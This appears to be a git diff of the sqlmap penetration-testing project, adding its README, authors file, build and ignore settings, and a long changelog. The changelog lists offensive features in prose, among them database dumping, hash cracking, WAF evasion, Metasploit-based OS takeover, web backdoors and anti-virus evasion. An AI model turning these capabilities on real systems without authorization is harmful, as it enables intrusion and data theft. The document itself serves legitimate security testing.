Automatic monthly tagging

Update errors.xml

.gitattributes

@@ -0,0 +1,14 @@
+*.py text eol=lf
+*.conf text eol=lf
+
+*_ binary
+*.dll binary
+*.pdf binary
+*.so binary
+*.wav binary
+*.zip binary
+*.x32 binary
+*.x64 binary
+*.exe binary
+*.sln binary
+*.vcproj binary

.gitignore

@@ -0,0 +1,5 @@
+*.py[cod]
+output/
+.sqlmap_history
+traffic.txt
+*~

.travis.yml

@@ -0,0 +1,6 @@
+language: python
+python:
+    - "2.6"
+    - "2.7"
+script:
+    - python -c "import sqlmap; import sqlmapapi"

README.md

@@ -0,0 +1,64 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
+
+Screenshots
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki.
+
+Installation
+----
+
+You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking  [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
+
+Usage
+----
+
+To get a list of basic options and switches use:
+
+    python sqlmap.py -h
+
+To get a list of all options and switches use:
+
+    python sqlmap.py -hh
+
+You can find a sample run [here](https://gist.github.com/stamparm/5335217).
+To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Links
+----
+
+* Homepage: http://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
+* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+
+Translations
+----
+
+* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
+* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
+* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
+* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
+* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
+* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)

doc/AUTHORS

@@ -1,7 +1,7 @@
-Bernardo Damele Assumpcao Guimaraes (inquis) - Lead developer
-<bernardo.damele@gmail.com>
-PGP Key ID: 0x05F5A30F
+Bernardo Damele Assumpcao Guimaraes (@inquisb)
+<bernardo@sqlmap.org>
 
-Miroslav Stampar (stamparm) - Developer since version 0.8-rc2
-<miroslav.stampar@gmail.com>
-PGP Key ID: 0xB5397B1B
+Miroslav Stampar (@stamparm)
+<miroslav@sqlmap.org>
+
+You can contact both developers by writing to dev@sqlmap.org

doc/CHANGELOG.md

@@ -0,0 +1,368 @@
+# Version 1.0 (2016-02-27)
+
+* Implemented support for automatic decoding of page content through detected charset.
+* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
+* Major improvements to program stabilization based on user reports.
+* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms.
+* Fixed major bug with DNS leaking in Tor mode.
+* Added wordlist compilation made of the most popular cracking dictionaries.
+* Implemented multi-processor hash cracking routine(s).
+* Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method.
+* Old resume files are now deprecated and replaced by faster SQLite based session mechanism.
+* Substantial code optimization and smaller memory footprint.
+* Added option `-m` for scanning multiple targets enlisted in a given textual file.
+* Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form.
+* Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests.
+* Added option `--host` for manually setting HTTP Host header value.
+* Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself.
+* Added option `--skip` for skipping tests for given parameter(s).
+* Added switch `--titles` for comparing pages based only on their titles.
+* Added option `--charset` for forcing character encoding used for data retrieval.
+* Added switch `--check-tor` for checking if Tor is used properly.
+* Added option `--crawl` for multithreaded crawling of a given website starting from the target url.
+* Added option `--csv-del` for manually setting delimiting character used in CSV output.
+* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
+* Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
+* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection.
+* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
+* Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
+* Major improvements to switches `--tables` and `--columns`.
+* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof.
+* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header.
+* Added switch `-a` to enumerate all DBMS data.
+* Added option `--alert` to run host OS command(s) when SQL injection is found.
+* Added option `--answers` to set user answers to asked questions during sqlmap run.
+* Added option `--auth-file` to set HTTP authentication PEM cert/private key file.
+* Added option `--charset` to force character encoding used during data retrieval.
+* Added switch `--check-tor` to force checking of proper usage of Tor.
+* Added option `--code` to set HTTP code to match when query is evaluated to True.
+* Added option `--cookie-del` to set character to be used while splitting cookie values.
+* Added option `--crawl` to set the crawling depth for the website starting from the target URL.
+* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`).
+* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token.
+* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token.
+* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`).
+* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password).
+* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies.
+* Added switch `--disable-coloring` to disable console output coloring.
+* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s).
+* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`).
+* Added option `--eval` for setting the Python code that will be evaluated before the request.
+* Added switch `--force-ssl` to force usage of SSL/HTTPS.
+* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval.
+* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`).
+* Added switch `-hh` for showing advanced help message.
+* Added option `--host` to set the HTTP Host header value.
+* Added switch `--hostname` to turn on retrieval of DBMS server hostname.
+* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
+* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection.
+* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
+* Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
+* Added switch `--invalid-logical` for usage of logical operations while invalidating values.
+* Added switch `--invalid-string` for usage of random strings while invalidating values.
+* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format.
+* Added option `-m` to set the textual file holding multiple targets for scanning purposes.
+* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`).
+* Added switch `--no-cast` for turning off payload casting mechanism.
+* Added switch `--no-escape` for turning off string escaping mechanism.
+* Added option `--not-string` for setting string to be matched when query is evaluated to False.
+* Added switch `--offline` to force work in offline mode (i.e. only use session data).
+* Added option `--output-dir` to set custom output directory path.
+* Added option `--param-del` to set character used for splitting parameter values.
+* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing).
+* Added option `--proxy-file` to set file holding proxy list.
+* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory.
+* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run.
+* Added option `--safe-post` to set POST data for sending to safe URL.
+* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL.
+* Added option `--skip` to skip testing of given parameter(s).
+* Added switch `--skip-static` to skip testing parameters that not appear dynamic.
+* Added switch `--skip-urlencode` to skip URL encoding of payload data.
+* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection.
+* Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
+* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
+* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
+* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`).
+* Added option `--test-skip` for skiping tests by payloads and/or titles (e.g. `BENCHMARK`).
+* Added switch `--titles` to turn on comparison of pages based only on their titles.
+* Added option `--tor-port` to explicitly set Tor proxy port.
+* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`).
+* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection.
+* Added option `--where` to set `WHERE` condition to be used during the table dumping.
+* Added option `-X` to exclude DBMS database table column(s) from enumeration.
+* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing.
+* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`).
+
+# Version 0.9 (2011-04-10)
+
+* Rewritten SQL injection detection engine.
+* Support to directly connect to the database without passing via a SQL injection, option `-d`.
+* Added full support for both time-based blind SQL injection and error-based SQL injection techniques.
+* Implemented support for SQLite 2 and 3.
+* Implemented support for Firebird.
+* Implemented support for Microsoft Access, Sybase and SAP MaxDB.
+* Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`.
+* Added support to tamper injection data with option `--tamper`.
+* Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack.
+* Added support to enumerate roles on Oracle, `--roles` switch.
+* Added support for SOAP based web services requests.
+* Added support to fetch unicode data.
+* Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`.
+* Implemented several optimization switches to speed up the exploitation of SQL injections.
+* Support to test and inject against HTTP Referer header.
+* Implemented HTTP(s) proxy authentication support, option `--proxy-cred`.
+* Implemented feature to speedup the enumeration of table names.
+* Support for customizable HTTP(s) redirections.
+* Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`.
+* Support to parse and test forms on target url, switch `--forms`.
+* Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL.
+* Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection.
+* Added safe URL feature, `--safe-url` and `--safe-freq`.
+* Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content.
+* Implemented few other features and switches.
+* Over 100 bugs fixed.
+* Major code refactoring.
+* User's manual updated.
+
+# Version 0.8 (2010-03-14)
+
+* Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials.
+* Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table.
+* Support for takeover features on PostgreSQL 8.4.
+* Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows.
+* Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root.
+* Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries.
+* Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function.
+* Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5.
+* Updated active fingerprint for PostgreSQL 8.4.
+* Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`.
+* Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses.
+* Support for Certificate authentication, `--auth-cert` option added.
+* Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`.
+* Added option `-r` to load a single HTTP request from a text file.
+* Added switch `--ignore-proxy` to ignore the system default HTTP proxy.
+* Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`.
+* Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`.
+* Major bug fix and enhancements to the multi-threading (`--threads`) functionality.
+* Fixed URL encoding/decoding of GET/POST parameters and Cookie header.
+* Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository.
+* Major bugs fixed.
+* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack.
+* Major code cleanup.
+* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware.
+* Updated user's manual.
+* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html.
+
+# Version 0.8 release candidate (2009-09-21)
+
+* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection.
+* Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable.
+* Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys.
+* Added options for MySQL and PostgreSQL to inject custom user-defined functions.
+* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output.
+* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified.
+* Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system.
+* Minor bugs fixed.
+* Major code refactoring.
+
+# Version 0.7 (2009-07-25)
+
+* Adapted Metasploit wrapping functions to work with latest 3.3 development version too.
+* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
+* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too.
+* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=).
+* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.
+* Major bug fix to sql-query/sql-shell features.
+* Major bug fix in `--read-file` option.
+* Major silent bug fix to multi-threading functionality.
+* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided.
+* Fixed MySQL 'comment injection' version fingerprint.
+* Fixed basic Microsoft SQL Server 2000 fingerprint.
+* Many minor bug fixes and code refactoring.
+
+# Version 0.7 release candidate (2009-04-22)
+
+* Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server;
+* Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux;
+* Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support;
+* Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit;
+* Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server;
+* Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable;
+* Speed up the inference algorithm by providing the minimum required charset for the query output;
+* Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little;
+* Many minor bug fixes, minor enhancements and layout adjustments.
+
+# Version 0.6.4 (2009-02-03)
+
+* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object;
+* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology;
+* Major speed increase in DBMS basic fingerprint;
+* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator;
+* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing;
+* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment;
+* Minor layout adjustment to the `--update` output;
+* Increased default timeout to 30 seconds;
+* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle;
+* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable;
+* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server;
+* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided;
+* Updated documentation.
+
+# Version 0.6.3 (2008-12-18)
+
+* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l <filepath>;
+* Major enhancement to support Partial UNION query SQL injection technique too;
+* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality;
+* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`;
+* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers;
+* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided;
+* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher;
+* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`;
+* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user;
+* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
+* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content;
+* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set;
+* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords;
+* Minor improvements to sqlmap Debian package files;
+* Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations;
+* Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url;
+* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
+* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified;
+* Minor bug fix to correctly dump table entries when the column is provided;
+* Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests;
+* Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread;
+* Increased default output level from 0 to 1;
+* Updated documentation.
+
+# Version 0.6.2 (2008-11-02)
+
+* Major bug fix to correctly dump tables entries when `--stop` is not specified;
+* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0;
+* Major bug fix when the request is POST to also send the GET parameters if any have been provided;
+* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`;
+* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file;
+* Minor bug fix in MySQL comment injection fingerprint technique;
+* Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database;
+* Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided;
+* Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
+* More user-friendly warning messages.
+
+# Version 0.6.1 (2008-08-20)
+
+* Major bug fix to blind SQL injection bisection algorithm to handle an exception;
+* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
+* Implemented possibility to test for and inject also on LIKE statements;
+* Implemented `--start` and `--stop` options to set the first and the last table entry to dump;
+* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool;
+* Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes;
+* Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore;
+* Minor bug fix to correctly handle parameters' value with `%` character.
+
+# Version 0.6 (2008-09-01)
+
+* Complete code refactor and many bugs fixed;
+* Added multithreading support to set the maximum number of concurrent HTTP requests;
+* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack;
+* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator;
+* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file;
+* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option;
+* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages;
+* Created sqlmap .exe (Windows) portable executable;
+* Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times;
+* Improved automatic check for parenthesis when testing and forging SQL query vector;
+* Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable;
+* Implemented support for HTTPS requests over HTTP(S) proxy;
+* Added a check to handle NULL or not available queries output;
+* More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks;
+* Improved XML files structure;
+* Implemented the possibility to change the HTTP Referer header;
+* Added support to resume from session file also when running with inband SQL injection attack;
+* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root;
+* Added a check to assure that the provided string to match (`--string`) is within the page content;
+* Fixed various queries in XML file;
+* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it;
+* Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function;
+* Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable;
+* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic;
+* Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires;
+* Added support to inject also on Set-Cookie parameters;
+* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`;
+* Renamed some command line options;
+* Added a conversion library;
+* Added code schema and reminders for future developments;
+* Added Copyright comment and $Id$;
+* Updated the command line layout and help messages;
+* Updated some docstrings;
+* Updated documentation files.
+
+# Version 0.5 (2007-11-04)
+
+* Added support for Oracle database management system
+* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins;
+* Added support to extract database users password hash on Microsoft SQL Server;
+* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;
+* Added support for SQL injection on HTTP Cookie and User-Agent headers;
+* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Splitted getValue() into getInband() and getBlind();
+* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;
+* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;
+* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`);
+* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default;
+* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml;
+* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped;
+* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py;
+* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`);
+* Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces;
+* More minor layout enhancements in some libraries;
+* Renamed DMBS plugins;
+* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
+* Updated all documentation files.
+
+# Version 0.4 (2007-06-15)
+
+* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS;
+* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
+* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
+* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
+* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <http://sqlmap.org/dev/>;
+* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
+* Improved logging functionality: passed from banal 'print' to Python native logging library;
+* Added support for more than one parameter in `-p` command line option;
+* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`);
+* Added the command line option `--remote-dbms` to manually specify the remote DBMS;
+* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements;
+* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`);
+* Added support to specify the database table column to enumerate (`-C COL`);
+* Added inband SQL injection (UNION query) support (`--union-use`);
+* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
+* Reviewed the directory tree structure;
+* Splitted lib/common.py: inband injection functionalities now are moved to lib/union.py;
+* Updated documentation files.
+
+# Version 0.3 (2007-01-20)
+
+* Added module for MS SQL Server;
+* Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check;
+* Added PostgreSQL dbms active fingerprint;
+* Added support for string match (`--string`);
+* Added support for UNION check (`--union-check`);
+* Removed duplicated code, delegated most of features to the engine in common.py and option.py;
+* Added support for `--data` command line argument to pass the string for POST requests;
+* Added encodeParams() method to encode url parameters before making http request;
+* Many bug fixes;
+* Rewritten documentation files;
+* Complete code restyling.
+
+# Version 0.2 (2006-12-13)
+
+* complete refactor of entire program;
+* added TODO and THANKS files;
+* added some papers references in README file;
+* moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header;
+* strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions;
+* replaced old inference algorithm with a new bisection algorithm.
+* reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter;
+* improved Common class, adding support for http proxy and http post method in hash_page;
+* added OptionCheck class in option.py which performs all needed checks on command line parameters and values;
+* added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters;
+* improved output methods in dump.py;
+* layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions.

doc/CONTRIBUTING.md

@@ -0,0 +1,38 @@
+# Contributing to sqlmap
+
+## Reporting bugs
+
+**Bug reports are welcome**!
+Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
+
+### Guidelines
+
+* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
+* Make sure you can reproduce the bug with the latest development version of sqlmap.
+* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
+* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
+* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up.
+
